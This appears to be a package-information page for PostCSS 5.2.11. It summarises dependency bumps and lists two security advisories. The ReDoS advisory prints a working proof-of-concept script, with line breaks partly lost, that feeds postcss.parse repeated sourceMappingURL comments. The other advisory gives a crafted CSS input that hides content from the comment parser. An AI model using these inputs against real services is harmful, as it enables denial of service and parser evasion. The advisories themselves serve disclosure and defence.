PostCSS 5.2.11 is a minor update to the popular JavaScript tool for transforming CSS with plugins, building upon version 5.2.10. Both versions share the primary function of enabling developers to manipulate CSS using JavaScript, offering a powerful ecosystem of plugins for tasks like autoprefixing, linting, and future CSS syntax transformations. Core dependencies such as chalk, js-base64, and source-map remain consistent, ensuring continued compatibility and functionality.
However, subtle but important changes exist. Notably, supports-color is updated from version 3.1.2 to 3.2.3. The devDependencies saw a bump in fs-extra from version 1.0.0 to 2.0.0, a change that may bring performance or feature upgrades during the development process. Also, important devDependency gulp-sourcemaps was updated from '2.3.1' to '2.4.0'. There were also minor version changes in babel-core from 6.21.0 to 6.22.1, babel-preset-es2015 from 6.18.0 to 6.22.0, and lint-staged from 3.2.6 to 3.2.7 so users that depends on this devDependencies may be affected and should take this in consideration when updating the package. These smaller version bumps within the development dependencies suggest improvements in build processes, testing, or tooling integration. Developers should review the changelogs of these updated packages for specific details on bug fixes, performance enhancements, or new features. Upgrading from 5.2.10 to 5.2.11 is likely a safe and recommended practice, especially for those seeking the latest improvements and bug fixes in the supporting development tools.
All the vulnerabilities related to the version 5.2.11 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.